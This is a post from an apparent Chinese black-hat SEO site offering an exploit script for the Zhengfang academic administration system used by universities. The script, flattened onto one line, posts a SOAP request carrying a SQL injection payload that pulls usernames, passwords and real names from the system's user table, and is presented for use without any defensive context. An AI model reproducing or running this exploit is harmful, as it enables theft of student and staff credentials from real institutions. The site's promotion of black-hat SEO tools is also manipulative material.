黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

正方教务系统漏洞利用exp

  #!/usr/bin/env python # -*- coding: utf-8 -*- #author: Windy import os import re import sys import urllib2 import httplib import random import time import string import requests from bs4 import BeautifulSoup def SendRtx(payload,xnxq,strKey): SENDTPL=”’ 正方教务系统漏洞利用exp %s %s %s ”’ SoapMessage=SENDTPL % (payload,xnxq,strKey) webservice=httplib.HTTP(“xxx.xxx.xxx.xxx”) webservice.putrequest(“POST”, “/service.asmx HTTP/1.1”) webservice.putheader(“Host”, “xxx.xxx.xx.xxx”) webservice.putheader(“Content-type”, “text/xml; charset=utf-8”) webservice.putheader(“Content-length”, “%d” % len(SoapMessage)) webservice.putheader(“SOAPAction”, “/”http://www.zf_webservice.com/GetStuCheckinInfo /””) webservice.endheaders() webservice.send(SoapMessage) #get the response statuscode, statusmessage, header=webservice.getreply() return statuscode, statusmessage, header if __name__==’__main__’: path=’C://Users//SpId3r//Desktop//get.txt’ payload=”222222′ union select YHM,KL,XM,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from YHB where ‘a’=’a” xnxq=”2013-2014-1″ strKey=”KKKGZ2312″ print SendRtx(payload,xnxq,strKey)

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » 正方教务系统漏洞利用exp
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜